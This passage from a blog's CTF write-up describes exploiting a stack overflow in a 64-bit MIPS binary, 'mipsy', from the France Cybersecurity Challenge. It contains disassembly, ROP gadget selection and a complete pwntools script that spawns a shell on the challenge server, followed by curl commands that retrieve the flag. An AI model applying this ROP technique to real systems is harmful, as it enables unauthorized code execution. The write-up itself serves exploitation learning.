class="line">              |                      |</span><br><span class="line">              |         out          |</span><br><span class="line">              |                      |</span><br><span class="line">$saved_fp-0x16+----------------------+</span><br><span class="line">              |       saved_gp       |</span><br><span class="line">$saved_fp-0x10+----------------------+</span><br><span class="line">              |       saved_fp       |</span><br><span class="line">   $saved_fp-8+----------------------+</span><br><span class="line">              |       saved_ra       |</span><br><span class="line">     $saved_fp+----------------------+</span><br><span class="line">              |                      |</span><br><span class="line">              |  calling function&#x27;s  |</span><br><span class="line">              |      stackframe      |</span><br><span class="line">              |                      |</span><br><span class="line">              |                      |</span><br><span class="line">              +----------------------+</span><br></pre></td></tr></table></figure>

<p>And so, according to this schema, we overwrite the saved <code>$ra</code> from a padding of <code>0x90-0x8=0x88</code> bytes.<br>But since we’re able to jmp everywhere, we have to figure out what kind of technique we want to use.</p>
<h4 id="One-gadget"><a href="#One-gadget" class="headerlink" title="One gadget ?"></a>One gadget ?</h4><p>For an obsure reason, I thought the <code>gets</code> function had for badchar the NULL byte, so I was looking for a one gadget in the binary.<br>I discovered during the reverse engineering part an interesting snippet of code: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000120003FC0                 .globl ip</span><br><span class="line">.text:0000000120003FC0 ip:                                      ; CODE XREF: main+260↓p</span><br><span class="line">.text:0000000120003FC0                                          ; DATA XREF: LOAD:0000000120002438↑o ...</span><br><span class="line">.text:0000000120003FC0</span><br><span class="line">.text:0000000120003FC0 ret             = -0x1050</span><br><span class="line">.text:0000000120003FC0 n_read          = -0x104C </span><br><span class="line">.text:0000000120003FC0 fd              = -0x1048</span><br><span class="line">.text:0000000120003FC0 var_1044        = -0x1044</span><br><span class="line">.text:0000000120003FC0 buf             = -0x1040</span><br><span class="line">.text:0000000120003FC0 ptr_binsh       = -0x40</span><br><span class="line">.text:0000000120003FC0 dash_c          = -0x38</span><br><span class="line">.text:0000000120003FC0 var_30          = -0x30</span><br><span class="line">.text:0000000120003FC0 null            = -0x28</span><br><span class="line">.text:0000000120003FC0 var_18          = -0x18</span><br><span class="line">.text:0000000120003FC0 var_10          = -0x10</span><br><span class="line">.text:0000000120003FC0 var_8           = -8</span><br><span class="line">.text:0000000120003FC0</span><br><span class="line">.text:0000000120003FC0                 daddiu  $sp, -0x1050     ; Doubleword Add Immediate Unsigned</span><br><span class="line">.text:0000000120003FC4                 sd      $ra, 0x1050+var_8($sp)  ; Store Doubleword</span><br><span class="line">.text:0000000120003FC8                 sd      $fp, 0x1050+var_10($sp)  ; Store Doubleword</span><br><span class="line">.text:0000000120003FCC                 sd      $gp, 0x1050+var_18($sp)  ; Store Doubleword</span><br><span class="line">.text:0000000120003FD0                 move    $fp, $sp         ; prologue</span><br><span class="line">.text:0000000120003FD4                 lui     $gp, 4           ; Load Upper Immediate</span><br><span class="line">.text:0000000120003FD8                 daddu   $gp, $t9         ; Doubleword Add Unsigned</span><br><span class="line">.text:0000000120003FDC                 daddiu  $gp, 0x4060      ; Doubleword Add Immediate Unsigned</span><br><span class="line">.text:0000000120003FE0                 dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">.text:0000000120003FE4                 daddiu  $v0, (aBinSh - 0x120020000)  ; &quot;/bin/sh&quot;</span><br><span class="line">.text:0000000120003FE8                 sd      $v0, 0x1010($fp)  ; Store Doubleword</span><br><span class="line">.text:0000000120003FEC                 dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">.text:0000000120003FF0                 daddiu  $v0, (aC - 0x120020000)  ; &quot;-c&quot;</span><br><span class="line">.text:0000000120003FF4                 sd      $v0, 0x1018($fp)  ; Store Doubleword</span><br><span class="line">.text:0000000120003FF8                 dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">.text:0000000120003FFC                 daddiu  $v0, (aListInterfaces - 0x120020000)  ; &quot;./list_interfaces.sh&quot;</span><br><span class="line">.text:0000000120004000                 sd      $v0, 0x1020($fp)  ; Store Doubleword</span><br><span class="line">.text:0000000120004004                 sd      $zero, 0x1028($fp)  ; Store Doubleword</span><br><span class="line">.text:0000000120004008                 daddiu  $v0, $fp, 8      ; Doubleword Add Immediate Unsigned</span><br><span class="line">.text:000000012000400C                 move    $a0, $v0         ; pipedes</span><br><span class="line">.text:0000000120004010                 dla     $v0, pipe        ; Load 64-bit address</span><br><span class="line">.text:0000000120004014                 move    $t9, $v0         ; pipe</span><br><span class="line">.text:0000000120004018                 jalr    $t9 ; pipe       ; Jump And Link Register</span><br><span class="line">.text:000000012000401C                 nop                      ; nop</span><br><span class="line">.text:0000000120004020                 move    $v1, $v0         ; return value</span><br><span class="line">.text:0000000120004024                 dli     $v0, 0xFFFFFFFFFFFFFFFF  ; Doubleword Load Immediate</span><br><span class="line">.text:0000000120004028                 bne     $v1, $v0, loc_120004070  ; Branch on Not Equal</span><br><span class="line">; skip</span><br><span class="line">.text:0000000120004070 loc_120004070:                           ; CODE XREF: ip+68↑j</span><br><span class="line">.text:0000000120004070                 dla     $v0, fork        ; Load 64-bit address</span><br><span class="line">.text:0000000120004074                 move    $t9, $v0         ; fork</span><br><span class="line">.text:0000000120004078                 jalr    $t9 ; fork       ; Jump And Link Register</span><br><span class="line">.text:000000012000407C                 nop                      ; nop</span><br><span class="line">.text:0000000120004080                 sw      $v0, 0($fp)      ; Store Word</span><br><span class="line">.text:0000000120004084                 lw      $v1, 0($fp)      ; Load Word</span><br><span class="line">.text:0000000120004088                 dli     $v0, -1          ; Doubleword Load Immediate</span><br><span class="line">.text:000000012000408C                 bne     $v1, $v0, loc_1200040D4  ; Branch on Not Equal</span><br><span class="line">; skip</span><br><span class="line">.text:00000001200040D4 loc_1200040D4:                           ; CODE XREF: ip+CC↑j</span><br><span class="line">.text:00000001200040D4                 lw      $v0, 0($fp)      ; Load Word</span><br><span class="line">.text:00000001200040D8                 bnez    $v0, loc_120004158  ; Branch on Not Zero</span><br><span class="line">.text:00000001200040DC                 nop                      ; nop</span><br><span class="line">.text:00000001200040E0                 lw      $v0, 0xC($fp)    ; Load Word</span><br><span class="line">.text:00000001200040E4                 li      $a1, 1           ; fd2</span><br><span class="line">.text:00000001200040E8                 move    $a0, $v0         ; fd</span><br><span class="line">.text:00000001200040EC                 dla     $v0, dup2        ; Load 64-bit address</span><br><span class="line">.text:00000001200040F0                 move    $t9, $v0         ; dup2</span><br><span class="line">.text:00000001200040F4                 jalr    $t9 ; dup2       ; Jump And Link Register</span><br><span class="line">.text:00000001200040F8                 nop                      ; nop</span><br><span class="line">.text:00000001200040FC                 lw      $v0, 8($fp)      ; Load Word</span><br><span class="line">.text:0000000120004100                 move    $a0, $v0         ; fd</span><br><span class="line">.text:0000000120004104                 dla     $v0, close       ; Load 64-bit address</span><br><span class="line">.text:0000000120004108                 move    $t9, $v0         ; close</span><br><span class="line">.text:000000012000410C                 jalr    $t9 ; close      ; Jump And Link Register</span><br><span class="line">.text:0000000120004110                 nop                      ; nop</span><br><span class="line">.text:0000000120004114                 lw      $v0, 0xC($fp)    ; Load Word</span><br><span class="line">.text:0000000120004118                 move    $a0, $v0         ; fd</span><br><span class="line">.text:000000012000411C                 dla     $v0, close       ; Load 64-bit address</span><br><span class="line">.text:0000000120004120                 move    $t9, $v0         ; close</span><br><span class="line">.text:0000000120004124                 jalr    $t9 ; close      ; Jump And Link Register</span><br><span class="line">.text:0000000120004128                 nop                      ; nop</span><br><span class="line">.text:000000012000412C                 ld      $v0, 0x1010($fp)  ; Load Doubleword</span><br><span class="line">.text:0000000120004130                 daddiu  $v1, $fp, 0x1010  ; Doubleword Add Immediate Unsigned</span><br><span class="line">.text:0000000120004134                 move    $a2, $zero       ; envp</span><br><span class="line">.text:0000000120004138                 move    $a1, $v1         ; argv</span><br><span class="line">.text:000000012000413C                 move    $a0, $v0         ; path</span><br><span class="line">.text:0000000120004140                 dla     $v0, execve      ; Load 64-bit address</span><br><span class="line">.text:0000000120004144                 move    $t9, $v0         ; execve</span><br><span class="line">.text:0000000120004148                 jalr    $t9 ; execve     ; Jump And Link Register</span><br><span class="line">.text:000000012000414C                 nop</span><br><span class="line">; skip</span><br></pre></td></tr></table></figure>

<p>It’s a part of the <code>ip</code> function, called when we trigger the “Show network interfaces” option. When I saw at the begin of the function, some local variables like a pointer to the <code>&quot;/bin/sh&quot;</code> string and a block of code which executes especially <code>execve(&quot;/bin/sh&quot;, &quot;-c&quot;, NULL)</code>. Since I discovered this basic block I thought I should have to jump around it with the right stackframe. But after a few hours I figured out it wasn’t possible :(. And figured out too that the <code>NULL</code> byte isn’t a badchar :).</p>
<h4 id="ROPchain"><a href="#ROPchain" class="headerlink" title="ROPchain"></a>ROPchain</h4><p>Now we’re able to craft a ropchain with only one badchar: “\n”. To do so we can launch <a target="_blank" rel="noopener" href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a> to find some suitable gadgets:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ROPgadget --binary mipsy &gt; gadgets</span><br></pre></td></tr></table></figure>

<p>On mips architechture there is no <code>ret</code> or <code>pop</code> instructions, to handle this issue we use gadgets which load directly a 64 bit value stored in the stack into a register like this: </p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ld $a0, <span class="number">0x8</span>($<span class="built_in">sp</span>) <span class="comment">; It will read the doubleword in $sp+8 to load it in the $a0 register.</span></span><br></pre></td></tr></table></figure>
<p>And to return we need to find a load on a register like <code>$t9</code> which is often used to resolve and call extern functions or on <code>$ra</code> which is the standard register used to store the address of the calling function.</p>
<p>And that’s why it’s too hard to find automatically gadgets for mips binaries. But fortunately, ROPgadgets finds a a great amount of gadgets which helps us a lot.</p>
<p>The exploitation would be for me to jmp to the execve’s call with the right context.<br>The code looks like such: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000120004134                 move    $a2, $zero       ; envp</span><br><span class="line">.text:0000000120004138                 move    $a1, $v1         ; argv</span><br><span class="line">.text:000000012000413C                 move    $a0, $v0         ; path</span><br><span class="line">.text:0000000120004140                 dla     $v0, execve      ; Load 64-bit address</span><br><span class="line">.text:0000000120004144                 move    $t9, $v0         ; execve</span><br><span class="line">.text:0000000120004148                 jalr    $t9 ; execve     ; Jump And Link Register</span><br><span class="line">.text:000000012000414C                 nop</span><br></pre></td></tr></table></figure>

<p>To do so we have to:</p>
<ul>
<li>set <code>$v1</code> register to <code>NULL</code></li>
<li>set <code>$v0</code> register to a pointer to <code>/bin/sh</code></li>
<li>set <code>$gp</code>, the global pointer to the right value to be able do execute the <code>dla</code> instruction.</li>
</ul>
<p>An important thing to notice is that on mips architechture, when an instruction is executed the next instruction is too executed despite of the result of the current instruction. So when we will choose our gadgets, we need to be careful according to the instruction after the control flow instruction.</p>
<p>And the good value for <code>$gp</code> is a constant from which the <a target="_blank" rel="noopener" href="https://sourceware.org/binutils/docs-2.24/as/MIPS-Small-Data.html"><code>dla</code></a> instruction addresses memory areas. And if we check the value of <code>$gp</code> in gdb, we got: <code>0x120048020</code>.</p>
<p>To control the <code>$v1</code> register we can grep on the gadgets found by ROPgadget: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ grep &quot;ld \$v0, &quot; gadgets | grep \$sp</span><br></pre></td></tr></table></figure>
<p>Then we got a lot of candidate which are not efficient. And if we’re very careful we find an interesting gadget:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x000000012001b4d8 : ld $v0, 0x210($sp) ; ld $t9, 0x228($sp) ; jalr $t9 ; move $a0, $s6</span><br></pre></td></tr></table></figure>
<p>It’s perfect because it allows us to control the value of <code>$v0</code> and the value of the next gadget that we can store in <code>$t9</code> to jump on !</p>
<p>We can apply process to find a gadget for $v1: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ grep &quot;ld \$v1, &quot; gadgets | grep \$sp</span><br><span class="line">[skip]</span><br><span class="line">0x000000012001270c : ld $v1, 0x80($sp) ; sd $v0, 0xf0($sp) ; dsubu $s5, $v0, $v1 ; dsll $v0, $s5, 6 ; ld $a0, 0xb8($sp) ; ld $t9, 0xe0($sp) ; move $a1, $v0 ; sd $v1, 0xf8($sp) ; jalr $t9 ; sd $v0, 0x100($sp)</span><br><span class="line">[skip]</span><br></pre></td></tr></table></figure>
<p>It’s a gadget a bit more hard to understand but we just have to take care to: do not write <code>$v0</code>, control the value of <code>$v9</code> to jump on, control the value of <code>$v1</code>. And so this gadget is a good candidate.</p>
<p>Finally we need to control the value of the <code>$gp</code> register but to achieve that we do not need to use a gadget, because we already control it thanks to the vuln epilogue:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">.text:00000001200046A4 loc_1200046A4:                           # CODE XREF: authenticate+104↑j</span><br><span class="line">.text:00000001200046A4                 move    $sp, $fp         # _</span><br><span class="line">.text:00000001200046A8                 ld      $ra, 0x90+ret_addr($sp)  # Load Doubleword</span><br><span class="line">.text:00000001200046AC                 ld      $fp, 0x90+var_10($sp)  # Load Doubleword</span><br><span class="line">.text:00000001200046B0                 ld      $gp, 0x90+var_18($sp)  # Load Doubleword</span><br><span class="line">.text:00000001200046B4                 daddiu  $sp, 0x90        # Doubleword Add Immediate Unsigned</span><br><span class="line">.text:00000001200046B8                 jr      $ra              # Jump Register</span><br><span class="line">.text:00000001200046BC                 nop</span><br></pre></td></tr></table></figure>

<h2 id="Put-all-together"><a href="#Put-all-together" class="headerlink" title="Put all together"></a>Put all together</h2><p>For the pruposes of mips exploitation I developped a small function in python which inserts automatically a value at an arbitrary offset.</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">make_pld</span>(<span class="params">s, val, pos</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(s) == pos:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[*] Gadget: s += <span class="subst">&#123;val&#125;</span>&quot;</span>)</span><br><span class="line">        s += val</span><br><span class="line">        <span class="keyword">return</span> s</span><br><span class="line">    <span class="keyword">elif</span> <span class="built_in">len</span>(s) &gt; pos:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[*] Gadget: <span class="subst">&#123;s[:pos-<span class="number">1</span>]&#125;</span> + <span class="subst">&#123;val&#125;</span> + <span class="subst">&#123;s[pos-<span class="number">1</span>+<span class="built_in">len</span>(val):]&#125;</span>&quot;</span>)</span><br><span class="line">        s = s[:pos-<span class="number">1</span>] + val + s[pos-<span class="number">1</span>+<span class="built_in">len</span>(val):]</span><br><span class="line">        <span class="keyword">return</span> s </span><br><span class="line">    <span class="keyword">elif</span> <span class="built_in">len</span>(s) &lt; pos:</span><br><span class="line">        k = <span class="string">&quot;\x00&quot;</span>*(pos-<span class="built_in">len</span>(s))</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[*] Gadget: <span class="subst">&#123;s&#125;</span> + <span class="subst">&#123;k&#125;</span> + <span class="subst">&#123;val&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> s + <span class="string">b&quot;\x00&quot;</span>*(pos-<span class="built_in">len</span>(s)) + val</span><br></pre></td></tr></table></figure>

<p>It’s very useful because we are then able to give the right offset about the stack pointer when we execute the gadgets.<br>We can begin by overwriting the value of the saved <code>$gp</code> and <code>$ra</code>:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GP = <span class="number">0x120048020</span></span><br><span class="line">BASE_RSP = <span class="number">0x90</span></span><br><span class="line"></span><br><span class="line">pld  = make_pld(<span class="string">b&quot;&quot;</span>, p64(GP), BASE_RSP-<span class="number">0x18</span>) <span class="comment"># $gp</span></span><br><span class="line">pld  = make_pld(pld, p64(SET_V1), BASE_RSP-<span class="number">0x8</span>) <span class="comment"># $ra</span></span><br></pre></td></tr></table></figure>
<p>BASE_RSP is the offset of the input’s buffer about the <code>$sp</code> address when we return and so when we start to execute some gadgets.<br>We indicate the gadget to execute which is the gadget which sets <code>$v1</code> register to zero.</p>
<p>Then we can put the right value in <code>$v1</code> by looking at the SET_V1 gadget which loads the doubleword in <code>0x80($sp)</code> in <code>$v1</code>.<br>So we have to add to our payload:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pld  = make_pld(pld, p64(<span class="number">0x0</span>), BASE_RSP+(<span class="number">0x80</span>)) <span class="comment"># $v1</span></span><br></pre></td></tr></table></figure>
<p>And we have to set the right value for the next gadget to execute. The gadget loads the doubleword in <code>0xe0($sp)</code> in <code>$t9</code> and then jmp on, so we can add our SET_V0 gadget to be then executed:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pld  = make_pld(pld, p64(SET_V0), BASE_RSP+(<span class="number">0xe0</span>)) <span class="comment"># $t9</span></span><br></pre></td></tr></table></figure>
<p>We repeat the same operation for the SET_V0 gadget by setting a pointer to <code>&#39;/bin/sh&#39;</code> in <code>0x210($sp)</code> and the address of the final execve call in <code>0x228($sp)</code>:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pld  = make_pld(pld, p64(BINSH), BASE_RSP+(<span class="number">0x210</span>)) <span class="comment"># $v0</span></span><br><span class="line">pld  = make_pld(pld, p64(EXECVE), BASE_RSP+(<span class="number">0x228</span>)) <span class="comment"># $t9</span></span><br></pre></td></tr></table></figure>

<p>We finished the ROPchain, now we just have to send it to the server and to enjoy the shell !</p>
<p>The final script looks like such:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> ELF, context, remote, p64 </span><br><span class="line"></span><br><span class="line">BINSH = <span class="number">0x120025A20</span></span><br><span class="line"></span><br><span class="line">e = ELF(<span class="string">&#x27;mipsy&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.bits = <span class="number">64</span> <span class="comment"># mips64</span></span><br><span class="line">context.arch = <span class="string">&quot;mips&quot;</span></span><br><span class="line">context.endian = <span class="string">&quot;big&quot;</span> <span class="comment"># Not a mipsel binary</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">make_pld</span>(<span class="params">s, val, pos</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(s) == pos:</span><br><span class="line">        s += val</span><br><span class="line">        <span class="keyword">return</span> s</span><br><span class="line">    <span class="keyword">elif</span> <span class="built_in">len</span>(s) &gt; pos:</span><br><span class="line">        s = s[:pos-<span class="number">1</span>] + val + s[pos-<span class="number">1</span>+<span class="built_in">len</span>(val):]</span><br><span class="line">        <span class="keyword">return</span> s </span><br><span class="line">    <span class="keyword">elif</span> <span class="built_in">len</span>(s) &lt; pos:</span><br><span class="line">        k = <span class="string">&quot;\x00&quot;</span>*(pos-<span class="built_in">len</span>(s))</span><br><span class="line">        <span class="keyword">return</span> s + <span class="string">b&quot;\x00&quot;</span>*(pos-<span class="built_in">len</span>(s)) + val </span><br><span class="line"></span><br><span class="line">SET_V0 = <span class="number">0x12001B4D8</span> <span class="comment"># : ld $v0, 0x210($sp) ; ld $t9, 0x228($sp) ; jalr $t9 ; move $a0, $s6</span></span><br><span class="line"></span><br><span class="line">SET_V1 = <span class="number">0x000000012001270c</span> <span class="comment"># : ld $v1, 0x80($sp) ; sd $v0, 0xf0($sp) ; dsubu $s5, $v0, $v1 ; dsll $v0, $s5, 6 ; ld $a0, 0xb8($sp) ; ld $t9, 0xe0($sp) ; move $a1, $v0 ; sd $v1, 0xf8($sp) ; jalr $t9 ; sd $v0, 0x100($sp)</span></span><br><span class="line"></span><br><span class="line">EXECVE = <span class="number">0x120004134</span></span><br><span class="line"></span><br><span class="line">GP = <span class="number">0x120048020</span></span><br><span class="line">BASE_RSP = <span class="number">0x90</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line">    <span class="keyword">return</span> remote(<span class="string">&quot;challenges2.france-cybersecurity-challenge.fr&quot;</span>, <span class="number">4005</span>)</span><br><span class="line">    <span class="comment"># return remote(&quot;localhost&quot;, 4000)</span></span><br><span class="line"></span><br><span class="line">io = start()</span><br><span class="line">io.sendlineafter(<span class="string">&quot;] &quot;</span>, <span class="string">b&quot;3&quot;</span>)</span><br><span class="line"></span><br><span class="line">pld  = make_pld(<span class="string">b&quot;&quot;</span>, p64(GP), BASE_RSP-<span class="number">0x18</span>) <span class="comment"># $gp</span></span><br><span class="line">pld  = make_pld(pld, p64(SET_V1), BASE_RSP-<span class="number">0x8</span>) <span class="comment"># $ra</span></span><br><span class="line">pld  = make_pld(pld, p64(<span class="number">0x0</span>), BASE_RSP+(<span class="number">0x80</span>)) <span class="comment"># $v1</span></span><br><span class="line">pld  = make_pld(pld, p64(SET_V0), BASE_RSP+(<span class="number">0xe0</span>)) <span class="comment"># $t9</span></span><br><span class="line">pld  = make_pld(pld, p64(BINSH), BASE_RSP+(<span class="number">0x210</span>)) <span class="comment"># $v0</span></span><br><span class="line">pld  = make_pld(pld, p64(EXECVE), BASE_RSP+(<span class="number">0x228</span>)) <span class="comment"># $t9</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">&quot;&gt;&gt;&gt; &quot;</span>, pld)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="Final-part"><a href="#Final-part" class="headerlink" title="Final part"></a>Final part</h2><p>According to the statements we need to read some files stored on the filer machine.<br>So firstly let’s run the exploit to get the shell:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ ./solve.py                                                                  </span><br><span class="line">[!] Could not emulate PLT instructions for ELF(&#x27;mipsy/mipsy&#x27;)</span><br><span class="line">[!] Could not populate PLT: not enough values to unpack (expected 2, got 0)</span><br><span class="line">[*] &#x27;mipsy/mipsy&#x27;</span><br><span class="line">    Arch:     mips64-64-big</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x120000000)</span><br><span class="line">    RWX:      Has RWX segments</span><br><span class="line">[+] Opening connection to challenges2.france-cybersecurity-challenge.fr on port 4005: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">Error: wrong password.</span><br><span class="line">$ id</span><br><span class="line">uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)</span><br><span class="line">$ ls</span><br><span class="line">list_interfaces.sh</span><br><span class="line">mipsy</span><br><span class="line">$</span><br></pre></td></tr></table></figure>

<p>We see no flag, so according to the statements maybe we have to curl the filer machine which seems to be a HTTP server:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$ curl filer</span><br><span class="line">&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01//EN&quot; &quot;http://www.w3.org/TR/html4/strict.dtd&quot;&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;&gt;</span><br><span class="line">&lt;title&gt;Directory listing for /&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1&gt;Directory listing for /&lt;/h1&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line">&lt;ul&gt;</span><br><span class="line">&lt;li&gt;&lt;a href=&quot;flag&quot;&gt;flag&lt;/a&gt;&lt;/li&gt;</span><br><span class="line">&lt;/ul&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>It’s a directory listing of the files stored in filer, and so we just have to <code>curl filer/flag</code> to get the flag:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ curl filer/flag</span><br><span class="line">FCSC&#123;82ed60ce9c8b1136b1da7df24c9996b6232671e66f62bad1bd0e3fc163761519&#125;</span><br></pre></td></tr></table></figure>

<p>And we got the flag !<br>This challenge was very cool because it’s a “real world” scenario and it makes me discovering mips assembly !</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/pwnasis/"
      title="[ASIS CTF QUALS 2021 - pwn] abbr & justpwnit"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [ASIS CTF QUALS 2021 - pwn] abbr &amp; justpwnit
        
    </p>
  </a>
